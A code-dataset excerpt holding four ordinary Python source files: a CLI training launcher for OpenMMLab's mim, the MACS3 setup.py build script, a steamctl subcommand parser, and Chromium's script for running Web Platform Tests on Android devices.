max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
mim/commands/train.py
|
zhouzaida/mim
| 188 |
75107
|
import os
import os.path as osp
import random as rd
import subprocess
from typing import Optional, Tuple, Union
import click
from mim.click import CustomCommand, param2lowercase
from mim.utils import (
echo_success,
exit_with_error,
get_installed_path,
highlighted_error,
is_installed,
module_full_name,
recursively_find,
)
@click.command(
name='train',
context_settings=dict(ignore_unknown_options=True),
cls=CustomCommand)
@click.argument('package', type=str, callback=param2lowercase)
@click.argument('config', type=str)
@click.option(
'-l',
'--launcher',
type=click.Choice(['none', 'pytorch', 'slurm'], case_sensitive=False),
default='none',
help='Job launcher')
@click.option(
'--port',
type=int,
default=None,
help=('The port used for inter-process communication (only applicable to '
'slurm / pytorch launchers). If set to None, will randomly choose '
'a port between 20000 and 30000. '))
@click.option(
'-G', '--gpus', type=int, default=1, help='Number of gpus to use')
@click.option(
'-g',
'--gpus-per-node',
type=int,
help=('Number of gpus per node to use '
'(only applicable to launcher == "slurm")'))
@click.option(
'-c',
'--cpus-per-task',
type=int,
default=2,
help='Number of cpus per task (only applicable to launcher == "slurm")')
@click.option(
'-p',
'--partition',
type=str,
help='The partition to use (only applicable to launcher == "slurm")')
@click.option(
'--srun-args', type=str, help='Other srun arguments that might be used')
@click.option('-y', '--yes', is_flag=True, help='Don’t ask for confirmation.')
@click.argument('other_args', nargs=-1, type=click.UNPROCESSED)
def cli(package: str,
config: str,
gpus: int,
gpus_per_node: int,
partition: str,
cpus_per_task: int = 2,
launcher: str = 'none',
port: int = None,
srun_args: Optional[str] = None,
yes: bool = False,
other_args: tuple = ()) -> None:
"""Perform Training.
Example:
\b
# Train models on a single server with CPU by setting `gpus` to 0 and
# 'launcher' to 'none' (if applicable). The training script of the
# corresponding codebase will fail if it doesn't support CPU training.
> mim train mmcls resnet101_b16x8_cifar10.py --work-dir tmp --gpus 0
# Train models on a single server with one GPU
> mim train mmcls resnet101_b16x8_cifar10.py --work-dir tmp --gpus 1
# Train models on a single server with 4 GPUs and pytorch distributed
> mim train mmcls resnet101_b16x8_cifar10.py --work-dir tmp --gpus 4 \
--launcher pytorch
# Train models on a slurm HPC with one 8-GPU node
> mim train mmcls resnet101_b16x8_cifar10.py --launcher slurm --gpus 8 \
--gpus-per-node 8 --partition partition_name --work-dir tmp
# Print help messages of sub-command train
> mim train -h
# Print help messages of sub-command train and the training script of mmcls
> mim train mmcls -h
"""
is_success, msg = train(
package=package,
config=config,
gpus=gpus,
gpus_per_node=gpus_per_node,
cpus_per_task=cpus_per_task,
partition=partition,
launcher=launcher,
port=port,
srun_args=srun_args,
yes=yes,
other_args=other_args)
if is_success:
echo_success(msg) # type: ignore
else:
exit_with_error(msg)
def train(
package: str,
config: str,
gpus: int,
gpus_per_node: int = None,
cpus_per_task: int = 2,
partition: str = None,
launcher: str = 'none',
port: int = None,
srun_args: Optional[str] = None,
yes: bool = True,
other_args: tuple = ()
) -> Tuple[bool, Union[str, Exception]]:
"""Train a model with given config.
Args:
package (str): The codebase name.
config (str): The config file path. If not exists, will search in the
config files of the codebase.
gpus (int): Number of gpus used for training.
gpus_per_node (int, optional): Number of gpus per node to use
(only applicable to launcher == "slurm"). Defaults to None.
cpus_per_task (int, optional): Number of cpus per task to use
(only applicable to launcher == "slurm"). Defaults to None.
partition (str, optional): The partition name
(only applicable to launcher == "slurm"). Defaults to None.
launcher (str, optional): The launcher used to launch jobs.
Defaults to 'none'.
port (int | None, optional): The port used for inter-process
communication (only applicable to slurm / pytorch launchers).
Default to None. If set to None, will randomly choose a port
between 20000 and 30000.
srun_args (str, optional): Other srun arguments that might be
used, all arguments should be in a string. Defaults to None.
yes (bool): Don’t ask for confirmation. Default: True.
other_args (tuple, optional): Other arguments, will be passed to the
codebase's training script. Defaults to ().
"""
full_name = module_full_name(package)
if full_name == '':
msg = f"Can't determine a unique package given abbreviation {package}"
raise ValueError(highlighted_error(msg))
package = full_name
# If launcher == "slurm", must have following args
if launcher == 'slurm':
msg = ('If launcher is slurm, '
'gpus-per-node and partition should not be None')
flag = (gpus_per_node is not None) and (partition is not None)
assert flag, msg
if port is None:
port = rd.randint(20000, 30000)
if launcher in ['slurm', 'pytorch']:
click.echo(f'Using port {port} for synchronization. ')
if not is_installed(package):
msg = (f'The codebase {package} is not installed, '
'do you want to install the latest release? ')
if yes or click.confirm(msg):
click.echo(f'Installing {package}')
cmd = ['mim', 'install', package]
ret = subprocess.check_call(cmd)
if ret != 0:
msg = f'{package} is not successfully installed'
raise RuntimeError(highlighted_error(msg))
else:
click.echo(f'{package} is successfully installed')
else:
msg = f'You can not train this model without {package} installed.'
return False, msg
pkg_root = get_installed_path(package)
if not osp.exists(config):
# configs is put in pkg/.mim in PR #68
config_root = osp.join(pkg_root, '.mim', 'configs')
if not osp.exists(config_root):
# If not pkg/.mim/config, try to search the whole pkg root.
config_root = pkg_root
# pkg/.mim/configs is a symbolic link to the real config folder,
# so we need to follow links.
files = recursively_find(
pkg_root, osp.basename(config), followlinks=True)
if len(files) == 0:
msg = (f"The path {config} doesn't exist and we can not find "
f'the config file in codebase {package}.')
raise ValueError(highlighted_error(msg))
elif len(files) > 1:
msg = (
f"The path {config} doesn't exist and we find multiple "
f'config files with same name in codebase {package}: {files}.')
raise ValueError(highlighted_error(msg))
# Use realpath instead of the symbolic path in pkg/.mim
config_path = osp.realpath(files[0])
click.echo(
f"The path {config} doesn't exist but we find the config file "
f'in codebase {package}, will use {config_path} instead.')
config = config_path
# tools will be put in package/.mim in PR #68
train_script = osp.join(pkg_root, '.mim', 'tools', 'train.py')
if not osp.exists(train_script):
train_script = osp.join(pkg_root, 'tools', 'train.py')
common_args = ['--launcher', launcher] + list(other_args)
if launcher == 'none':
if gpus:
cmd = ['python', train_script, config, '--gpus',
str(gpus)] + common_args
else:
cmd = ['python', train_script, config, '--device', 'cpu'
] + common_args
elif launcher == 'pytorch':
cmd = [
'python', '-m', 'torch.distributed.launch',
f'--nproc_per_node={gpus}', f'--master_port={port}', train_script,
config
] + common_args
elif launcher == 'slurm':
parsed_srun_args = srun_args.split() if srun_args else []
has_job_name = any([('--job-name' in x) or ('-J' in x)
for x in parsed_srun_args])
if not has_job_name:
job_name = osp.splitext(osp.basename(config))[0]
parsed_srun_args.append(f'--job-name={job_name}_train')
cmd = [
'srun', '-p', f'{partition}', f'--gres=gpu:{gpus_per_node}',
f'--ntasks={gpus}', f'--ntasks-per-node={gpus_per_node}',
f'--cpus-per-task={cpus_per_task}', '--kill-on-bad-exit=1'
] + parsed_srun_args + ['python', '-u', train_script, config
] + common_args
cmd_text = ' '.join(cmd)
click.echo(f'Training command is {cmd_text}. ')
ret = subprocess.check_call(
cmd, env=dict(os.environ, MASTER_PORT=str(port)))
if ret == 0:
return True, 'Training finished successfully. '
else:
return False, 'Training not finished successfully. '
|
setup.py
|
bgruening/MACS
| 159 |
75141
|
<gh_stars>100-1000
#!/usr/bin/env python3
"""Description:
Setup script for MACS -- Model Based Analysis for ChIP-Seq data
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD License (see the file LICENSE included with
the distribution).
"""
import sys
import os
import re
from setuptools import setup, Extension
import subprocess
import sysconfig
import numpy
# get MACS version
exec(open("MACS3/Utilities/Constants.py").read())
# classifiers
classifiers =[\
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Operating System :: Unix',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Cython', ]
install_requires = [ "numpy>=1.17",
"cykhash>=1.0.2",
"Cython>=0.29" ]
tests_requires = [ 'pytest' ]
def main():
if float(sys.version[:3])<3.6:
sys.stderr.write("CRITICAL: Python version must >= 3.6!\n")
sys.exit(1)
# NumPy include dir
numpy_include_dir = [ numpy.get_include() ]
# CFLAG
# I intend to use -Ofast, however if gcc version < 4.6, this option is unavailable so...
# should I care about old gcc compiler?...
extra_c_args = ["-w","-Ofast", "-g0"] # for C, -Ofast implies -O3 and -ffast-math
# CFLAG for fermi-lite related codes
clang = False
icc = False
new_gcc = False
try:
if os.environ['CC'] == "clang":
clang = True
except KeyError:
pass
if not clang:
try:
gcc_version_check = subprocess.check_output( ["gcc", "--version"], universal_newlines=True)
if gcc_version_check.find("clang") != -1:
clang = True
else:
gcc_version_check = gcc_version_check.split('\n')[0] # get the first line
m = re.search( "\s+(\d+\.\d+)\.\d+", gcc_version_check )
if m:
gcc_version = float( m[1] )
if gcc_version > 4.8:
new_gcc = True
except subprocess.CalledProcessError:
pass
try:
if os.environ['CC'] == "icc":
icc = True
except KeyError:
pass
extra_c_args_for_fermi = ["-std=gnu99","-DUSE_SIMDE", "-DSIMDE_ENABLE_NATIVE_ALIASES"]
if icc or sysconfig.get_config_vars()['CC'] == 'icc':
extra_c_args_for_fermi.extend(['-qopenmp-simd', '-DSIMDE_ENABLE_OPENMP'])
elif new_gcc or clang or sysconfig.get_config_vars()['CC'] == 'clang':
extra_c_args_for_fermi.extend(['-fopenmp-simd', '-DSIMDE_ENABLE_OPENMP'])
# extensions, those has to be processed by Cython
ext_modules = [ \
# Signal
Extension("MACS3.Signal.Prob", ["MACS3/Signal/Prob.pyx"], libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args ),
Extension("MACS3.Signal.Pileup", ["MACS3/Signal/Pileup.pyx","MACS3/Signal/cPosValCalculation.c"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args ),
Extension("MACS3.Signal.PeakModel", ["MACS3/Signal/PeakModel.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.PeakDetect", ["MACS3/Signal/PeakDetect.pyx"], extra_compile_args=extra_c_args),
Extension("MACS3.Signal.SignalProcessing", ["MACS3/Signal/SignalProcessing.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.FixWidthTrack", ["MACS3/Signal/FixWidthTrack.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.PairedEndTrack", ["MACS3/Signal/PairedEndTrack.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.BedGraph", ["MACS3/Signal/BedGraph.pyx"], libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.ScoreTrack", ["MACS3/Signal/ScoreTrack.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args ),
Extension("MACS3.Signal.CallPeakUnit", ["MACS3/Signal/CallPeakUnit.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.VariantStat",["MACS3/Signal/VariantStat.pyx",],libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.ReadAlignment",["MACS3/Signal/ReadAlignment.pyx",],libraries=["m"],include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.RACollection",["MACS3/Signal/RACollection.pyx","MACS3/fermi-lite/bfc.c","MACS3/fermi-lite/bseq.c",\
"MACS3/fermi-lite/bubble.c","MACS3/fermi-lite/htab.c","MACS3/fermi-lite/ksw.c","MACS3/fermi-lite/kthread.c",\
"MACS3/fermi-lite/mag.c","MACS3/fermi-lite/misc.c","MACS3/fermi-lite/mrope.c","MACS3/fermi-lite/rld0.c",\
"MACS3/fermi-lite/rle.c","MACS3/fermi-lite/rope.c","MACS3/fermi-lite/unitig.c", "MACS3/Signal/swalign.c" ], \
libraries=["m","z"], include_dirs=numpy_include_dir+["./","./MACS3/fermi-lite/","./MACS3/Signal/"], extra_compile_args=extra_c_args+extra_c_args_for_fermi),
Extension("MACS3.Signal.UnitigRACollection",["MACS3/Signal/UnitigRACollection.pyx"],libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.PosReadsInfo",["MACS3/Signal/PosReadsInfo.pyx",],libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.PeakVariants",["MACS3/Signal/PeakVariants.pyx",],libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
# IO
Extension("MACS3.IO.Parser",["MACS3/IO/Parser.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.IO.PeakIO", ["MACS3/IO/PeakIO.pyx"], extra_compile_args=extra_c_args),
Extension("MACS3.IO.BedGraphIO", ["MACS3/IO/BedGraphIO.pyx"], extra_compile_args=extra_c_args),
Extension("MACS3.IO.BAM",["MACS3/IO/BAM.pyx",],libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args) ]
with open("README.md", "r") as fh:
long_description = fh.read()
setup( name = "MACS3",
version = MACS_VERSION,
description = "Model Based Analysis for ChIP-Seq data",
long_description = long_description,
long_description_content_type = "text/markdown",
author = '<NAME>',
author_email = '<EMAIL>',
url = 'http://github.com/macs3-project/MACS/',
package_dir = {'MACS3' : 'MACS3'},
packages = ['MACS3', 'MACS3.IO', 'MACS3.Signal', 'MACS3.Commands','MACS3.Utilities'],
package_data = {'MACS3':['*.pxd']},
scripts = ['bin/macs3', ],
classifiers = classifiers,
install_requires = install_requires,
setup_requires = install_requires,
tests_require = tests_requires,
python_requires = '>=3.6',
ext_modules = ext_modules )
if __name__ == '__main__':
main()
|
steamctl/commands/assistant/__init__.py
|
rossengeorgiev/steamctl
| 138 |
75144
|
<filename>steamctl/commands/assistant/__init__.py
from steamctl.argparser import register_command
epilog = """\
"""
@register_command('assistant', help='Helpful automation', epilog=epilog)
def cmd_parser(cp):
def print_help(*args, **kwargs):
cp.print_help()
cp.set_defaults(_cmd_func=print_help)
sub_cp = cp.add_subparsers(metavar='<subcommand>',
dest='subcommand',
title='List of sub-commands',
description='',
)
scp_i = sub_cp.add_parser("idle-games", help="Idle up to 32 games for game time")
scp_i.set_defaults(_cmd_func=__name__ + '.card_idler:cmd_assistant_idle_games')
scp_i.add_argument('app_ids', nargs='+', metavar='AppID', type=int, help='App ID(s) to idle')
scp_i = sub_cp.add_parser("idle-cards", help="Automatic idling for game cards")
scp_i.set_defaults(_cmd_func=__name__ + '.card_idler:cmd_assistant_idle_cards')
scp_i = sub_cp.add_parser("discovery-queue", help="Explore a single discovery queue")
scp_i.set_defaults(_cmd_func=__name__ + '.discovery_queue:cmd_assistant_discovery_queue')
|
testing/scripts/run_android_wpt.py
|
iridium-browser/iridium-browser
| 575 |
75204
|
<reponame>iridium-browser/iridium-browser<filename>testing/scripts/run_android_wpt.py
#!/usr/bin/env vpython3
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs Web Platform Tests (WPT) on Android browsers.
This script supports running tests on the Chromium Waterfall by mapping isolated
script flags to WPT flags.
It is also useful for local reproduction by performing APK installation and
configuring the browser to resolve test hosts. Be sure to invoke this
executable directly rather than using python run_android_wpt.py so that
WPT dependencies in Chromium vpython are found.
If you need more advanced test control, please use the runner located at
//third_party/wpt_tools/wpt/wpt.
Here's the mapping [isolate script flag] : [wpt flag]
--isolated-script-test-output : --log-chromium
--total-shards : --total-chunks
--shard-index : -- this-chunk
"""
# TODO(aluo): Combine or factor out commons parts with run_wpt_tests.py script.
import argparse
import contextlib
import json
import logging
import os
import shutil
import sys
import common
import wpt_common
logger = logging.getLogger(__name__)
SRC_DIR = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
BUILD_ANDROID = os.path.join(SRC_DIR, 'build', 'android')
BLINK_TOOLS_DIR = os.path.join(
SRC_DIR, 'third_party', 'blink', 'tools')
CATAPULT_DIR = os.path.join(SRC_DIR, 'third_party', 'catapult')
DEFAULT_WPT = os.path.join(
SRC_DIR, 'third_party', 'wpt_tools', 'wpt', 'wpt')
PYUTILS = os.path.join(CATAPULT_DIR, 'common', 'py_utils')
if PYUTILS not in sys.path:
sys.path.append(PYUTILS)
if BLINK_TOOLS_DIR not in sys.path:
sys.path.append(BLINK_TOOLS_DIR)
if BUILD_ANDROID not in sys.path:
sys.path.append(BUILD_ANDROID)
import devil_chromium
from blinkpy.web_tests.port.android import (
PRODUCTS, PRODUCTS_TO_EXPECTATION_FILE_PATHS, ANDROID_WEBLAYER,
ANDROID_WEBVIEW, CHROME_ANDROID, ANDROID_DISABLED_TESTS)
from devil import devil_env
from devil.android import apk_helper
from devil.android import device_utils
from devil.android.tools import system_app
from devil.android.tools import webview_app
from pylib.local.emulator import avd
from py_utils.tempfile_ext import NamedTemporaryDirectory
class PassThroughArgs(argparse.Action):
pass_through_args = []
def __call__(self, parser, namespace, values, option_string=None):
if option_string:
if self.nargs == 0:
self.add_unique_pass_through_arg(option_string)
elif self.nargs is None:
self.add_unique_pass_through_arg('{}={}'.format(option_string, values))
else:
raise ValueError("nargs {} not supported: {} {}".format(
self.nargs, option_string, values))
@classmethod
def add_unique_pass_through_arg(cls, arg):
if arg not in cls.pass_through_args:
cls.pass_through_args.append(arg)
def _get_adapter(product, device):
if product == ANDROID_WEBLAYER:
return WPTWeblayerAdapter(device)
elif product == ANDROID_WEBVIEW:
return WPTWebviewAdapter(device)
else:
return WPTClankAdapter(device)
class WPTAndroidAdapter(wpt_common.BaseWptScriptAdapter):
def __init__(self, device):
self.pass_through_wpt_args = []
self.pass_through_binary_args = []
self._metadata_dir = None
self._device = device
super(WPTAndroidAdapter, self).__init__()
# Arguments from add_extra_argumentsparse were added so
# its safe to parse the arguments and set self._options
self.parse_args()
self.output_directory = os.path.join(SRC_DIR, 'out', self.options.target)
self.mojo_js_directory = os.path.join(self.output_directory, 'gen')
@property
def rest_args(self):
rest_args = super(WPTAndroidAdapter, self).rest_args
# Here we add all of the arguments required to run WPT tests on Android.
rest_args.extend([self.options.wpt_path])
# By default, WPT will treat unexpected passes as errors, so we disable
# that to be consistent with Chromium CI.
rest_args.extend(["--no-fail-on-unexpected-pass"])
# vpython has packages needed by wpt, so force it to skip the setup
rest_args.extend(["--venv=" + SRC_DIR, "--skip-venv-setup"])
rest_args.extend(["run",
"--tests=" + wpt_common.EXTERNAL_WPT_TESTS_DIR,
"--test-type=" + self.options.test_type,
"--device-serial", self._device.serial,
"--webdriver-binary",
self.options.webdriver_binary,
"--headless",
"--no-pause-after-test",
"--no-capture-stdio",
"--no-manifest-download",
"--binary-arg=--enable-blink-features=MojoJS,MojoJSTest",
"--binary-arg=--enable-blink-test-features",
"--binary-arg=--disable-field-trial-config",
"--enable-mojojs",
"--mojojs-path=" + self.mojo_js_directory,
])
# if metadata was created then add the metadata directory
# to the list of wpt arguments
if self._metadata_dir:
rest_args.extend(['--metadata', self._metadata_dir])
if self.options.verbose >= 3:
rest_args.extend(["--log-mach=-", "--log-mach-level=debug",
"--log-mach-verbose"])
if self.options.verbose >= 4:
rest_args.extend(['--webdriver-arg=--verbose',
'--webdriver-arg="--log-path=-"'])
rest_args.extend(self.pass_through_wpt_args)
return rest_args
@property
def browser_specific_expectations_path(self):
raise NotImplementedError
def _extra_metadata_builder_args(self):
args = ['--additional-expectations=%s' % path
for path in self.options.additional_expectations]
if not self.options.ignore_browser_specific_expectations:
args.extend(['--additional-expectations',
self.browser_specific_expectations_path])
return args
def _maybe_build_metadata(self):
metadata_builder_cmd = [
sys.executable,
os.path.join(wpt_common.BLINK_TOOLS_DIR, 'build_wpt_metadata.py'),
'--android-product',
self.options.product,
'--metadata-output-dir',
self._metadata_dir,
'--additional-expectations',
ANDROID_DISABLED_TESTS,
'--use-subtest-results',
]
if self.options.ignore_default_expectations:
metadata_builder_cmd += [ '--ignore-default-expectations' ]
metadata_builder_cmd.extend(self._extra_metadata_builder_args())
return common.run_command(metadata_builder_cmd)
def run_test(self):
with NamedTemporaryDirectory() as tmp_dir, self._install_apks():
self._metadata_dir = os.path.join(tmp_dir, 'metadata_dir')
metadata_command_ret = self._maybe_build_metadata()
if metadata_command_ret != 0:
return metadata_command_ret
# If there is no metadata then we need to create an
# empty directory to pass to wptrunner
if not os.path.exists(self._metadata_dir):
os.makedirs(self._metadata_dir)
return super(WPTAndroidAdapter, self).run_test()
def _install_apks(self):
raise NotImplementedError
def clean_up_after_test_run(self):
# Avoid having a dangling reference to the temp directory
# which was deleted
self._metadata_dir = None
def add_extra_arguments(self, parser):
# TODO: |pass_through_args| are broke and need to be supplied by way of
# --binary-arg".
class BinaryPassThroughArgs(PassThroughArgs):
pass_through_args = self.pass_through_binary_args
class WPTPassThroughArgs(PassThroughArgs):
pass_through_args = self.pass_through_wpt_args
# Add this so that product argument does not go in self._rest_args
# when self.parse_args() is called
parser.add_argument('--target', '-t', default='Release',
help='Specify the target build subdirectory under'
' src/out/.')
parser.add_argument('--product', help=argparse.SUPPRESS)
parser.add_argument('--webdriver-binary', required=True,
help='Path of the webdriver binary. It needs to have'
' the same major version as the apk.')
parser.add_argument('--wpt-path', default=DEFAULT_WPT,
help='Controls the path of the WPT runner to use'
' (therefore tests). Defaults the revision rolled into'
' Chromium.')
parser.add_argument('--additional-expectations',
action='append', default=[],
help='Paths to additional test expectations files.')
parser.add_argument('--ignore-default-expectations', action='store_true',
help='Do not use the default set of'
' TestExpectations files.')
parser.add_argument('--ignore-browser-specific-expectations',
action='store_true', default=False,
help='Ignore browser specific expectation files.')
parser.add_argument('--test-type', default='testharness',
help='Specify to experiment with other test types.'
' Currently only the default is expected to work.')
parser.add_argument('--verbose', '-v', action='count', default=0,
help='Verbosity level.')
parser.add_argument('--repeat',
action=WPTPassThroughArgs, type=int,
help='Number of times to run the tests.')
parser.add_argument('--include', metavar='TEST_OR_DIR',
action=WPTPassThroughArgs,
help='Test(s) to run, defaults to run all tests.')
parser.add_argument('--include-file',
action=WPTPassThroughArgs,
help='A file listing test(s) to run')
parser.add_argument('--list-tests', action=WPTPassThroughArgs, nargs=0,
help="Don't run any tests, just print out a list of"
' tests that would be run.')
parser.add_argument('--webdriver-arg', action=WPTPassThroughArgs,
help='WebDriver args.')
parser.add_argument('--log-wptreport', metavar='WPT_REPORT_FILE',
action=WPTPassThroughArgs,
help="Log wptreport with subtest details.")
parser.add_argument('--log-raw', metavar='RAW_REPORT_FILE',
action=WPTPassThroughArgs,
help="Log raw report.")
parser.add_argument('--log-html', metavar='HTML_REPORT_FILE',
action=WPTPassThroughArgs,
help="Log html report.")
parser.add_argument('--log-xunit', metavar='XUNIT_REPORT_FILE',
action=WPTPassThroughArgs,
help="Log xunit report.")
parser.add_argument('--enable-features', action=BinaryPassThroughArgs,
help='Chromium features to enable during testing.')
parser.add_argument('--disable-features', action=BinaryPassThroughArgs,
help='Chromium features to disable during testing.')
parser.add_argument('--disable-field-trial-config',
action=BinaryPassThroughArgs,
help='Disable test trials for Chromium features.')
parser.add_argument('--force-fieldtrials', action=BinaryPassThroughArgs,
help='Force trials for Chromium features.')
parser.add_argument('--force-fieldtrial-params',
action=BinaryPassThroughArgs,
help='Force trial params for Chromium features.')
add_emulator_args(parser)
class WPTWeblayerAdapter(WPTAndroidAdapter):
WEBLAYER_SHELL_PKG = 'org.chromium.weblayer.shell'
WEBLAYER_SUPPORT_PKG = 'org.chromium.weblayer.support'
@contextlib.contextmanager
def _install_apks(self):
install_weblayer_shell_as_needed = maybe_install_user_apk(
self._device, self.options.weblayer_shell, self.WEBLAYER_SHELL_PKG)
install_weblayer_support_as_needed = maybe_install_user_apk(
self._device, self.options.weblayer_support, self.WEBLAYER_SUPPORT_PKG)
install_webview_provider_as_needed = maybe_install_webview_provider(
self._device, self.options.webview_provider)
with install_weblayer_shell_as_needed, \
install_weblayer_support_as_needed, \
install_webview_provider_as_needed:
yield
@property
def browser_specific_expectations_path(self):
return PRODUCTS_TO_EXPECTATION_FILE_PATHS[ANDROID_WEBLAYER]
def add_extra_arguments(self, parser):
super(WPTWeblayerAdapter, self).add_extra_arguments(parser)
parser.add_argument('--weblayer-shell',
help='WebLayer Shell apk to install.')
parser.add_argument('--weblayer-support',
help='WebLayer Support apk to install.')
parser.add_argument('--webview-provider',
help='Webview provider apk to install.')
@property
def rest_args(self):
args = super(WPTWeblayerAdapter, self).rest_args
args.append(ANDROID_WEBLAYER)
return args
class WPTWebviewAdapter(WPTAndroidAdapter):
def __init__(self, device):
super(WPTWebviewAdapter, self).__init__(device)
if self.options.system_webview_shell is not None:
self.system_webview_shell_pkg = apk_helper.GetPackageName(
self.options.system_webview_shell)
else:
self.system_webview_shell_pkg = 'org.chromium.webview_shell'
@contextlib.contextmanager
def _install_apks(self):
install_shell_as_needed = maybe_install_user_apk(
self._device, self.options.system_webview_shell,
self.system_webview_shell_pkg)
install_webview_provider_as_needed = maybe_install_webview_provider(
self._device, self.options.webview_provider)
with install_shell_as_needed, install_webview_provider_as_needed:
yield
@property
def browser_specific_expectations_path(self):
return PRODUCTS_TO_EXPECTATION_FILE_PATHS[ANDROID_WEBVIEW]
def add_extra_arguments(self, parser):
super(WPTWebviewAdapter, self).add_extra_arguments(parser)
parser.add_argument('--system-webview-shell',
help=('System WebView Shell apk to install. If not '
'specified then the on-device WebView apk '
'will be used.'))
parser.add_argument('--webview-provider',
help='Webview provider APK to install.')
@property
def rest_args(self):
args = super(WPTWebviewAdapter, self).rest_args
args.extend(['--package-name', self.system_webview_shell_pkg])
args.append(ANDROID_WEBVIEW)
return args
class WPTClankAdapter(WPTAndroidAdapter):
@contextlib.contextmanager
def _install_apks(self):
install_clank_as_needed = maybe_install_user_apk(
self._device, self.options.chrome_apk)
with install_clank_as_needed:
yield
@property
def browser_specific_expectations_path(self):
return PRODUCTS_TO_EXPECTATION_FILE_PATHS[CHROME_ANDROID]
def add_extra_arguments(self, parser):
super(WPTClankAdapter, self).add_extra_arguments(parser)
parser.add_argument(
'--chrome-apk', help='Chrome apk to install.')
parser.add_argument(
'--chrome-package-name',
help=('The package name of Chrome to test,'
' defaults to that of the compiled Chrome apk.'))
@property
def rest_args(self):
args = super(WPTClankAdapter, self).rest_args
if not self.options.chrome_package_name and not self.options.chrome_apk:
raise Exception('Either the --chrome-package-name or --chrome-apk '
'command line arguments must be used.')
if not self.options.chrome_package_name:
self.options.chrome_package_name = apk_helper.GetPackageName(
self.options.chrome_apk)
logger.info("Using Chrome apk's default package %s." %
self.options.chrome_package_name)
args.extend(['--package-name', self.options.chrome_package_name])
# add the product postional argument
args.append(CHROME_ANDROID)
return args
def maybe_install_webview_provider(device, apk):
if apk:
logger.info('Will install WebView apk at ' + apk)
return webview_app.UseWebViewProvider(device, apk)
else:
return no_op()
def maybe_install_user_apk(device, apk, expected_pkg=None):
"""contextmanager to install apk on device.
Args:
device: DeviceUtils instance on which to install the apk.
apk: Apk file path on host.
expected_pkg: Optional, check that apk's package name matches.
Returns:
If apk evaluates to false, returns a do-nothing contextmanager.
Otherwise, returns a contextmanager to install apk on device.
"""
if apk:
pkg = apk_helper.GetPackageName(apk)
if expected_pkg and pkg != expected_pkg:
raise ValueError('{} has incorrect package name: {}, expected {}.'.format(
apk, pkg, expected_pkg))
install_as_needed = app_installed(device, apk, pkg)
logger.info('Will install ' + pkg + ' at ' + apk)
else:
install_as_needed = no_op()
return install_as_needed
@contextlib.contextmanager
def app_installed(device, apk, pkg):
device.Install(apk)
try:
yield
finally:
device.Uninstall(pkg)
# Dummy contextmanager to simplify multiple optional managers.
@contextlib.contextmanager
def no_op():
yield
# This is not really a "script test" so does not need to manually add
# any additional compile targets.
def main_compile_targets(args):
json.dump([], args.output)
@contextlib.contextmanager
def get_device(args):
instance = None
try:
if args.avd_config:
avd_config = avd.AvdConfig(args.avd_config)
logger.warning('Install emulator from ' + args.avd_config)
avd_config.Install()
instance = avd_config.CreateInstance()
instance.Start(writable_system=True, window=args.emulator_window)
device_utils.DeviceUtils(instance.serial).WaitUntilFullyBooted()
#TODO(weizhong): when choose device, make sure abi matches with target
devices = device_utils.DeviceUtils.HealthyDevices()
if devices:
yield devices[0]
else:
yield
finally:
if instance:
instance.Stop()
def add_emulator_args(parser):
parser.add_argument(
'--avd-config',
type=os.path.realpath,
help='Path to the avd config textpb. '
'(See //tools/android/avd/proto/ for message definition'
' and existing textpb files.)')
parser.add_argument(
'--emulator-window',
action='store_true',
default=False,
help='Enable graphical window display on the emulator.')
def main():
devil_chromium.Initialize()
usage = '%(prog)s --product={' + ','.join(PRODUCTS) + '} ...'
product_parser = argparse.ArgumentParser(
add_help=False, prog='run_android_wpt.py', usage=usage)
product_parser.add_argument(
'--product', action='store', required=True, choices=PRODUCTS)
add_emulator_args(product_parser)
args, _ = product_parser.parse_known_args()
product = args.product
with get_device(args) as device:
if not device:
logger.error('There are no devices attached to this host. Exiting...')
return
adapter = _get_adapter(product, device)
if adapter.options.verbose:
if adapter.options.verbose == 1:
logger.setLevel(logging.INFO)
else:
logger.setLevel(logging.DEBUG)
# WPT setup for chrome and webview requires that PATH contains adb.
platform_tools_path = os.path.dirname(devil_env.config.FetchPath('adb'))
os.environ['PATH'] = ':'.join([platform_tools_path] +
os.environ['PATH'].split(':'))
return adapter.run_test()
if __name__ == '__main__':
# Conform minimally to the protocol defined by ScriptTest.
if 'compile_targets' in sys.argv:
funcs = {
'run': None,
'compile_targets': main_compile_targets,
}
sys.exit(common.run_script(sys.argv[1:], funcs))
logging.basicConfig(level=logging.WARNING)
logger = logging.getLogger()
sys.exit(main())
|
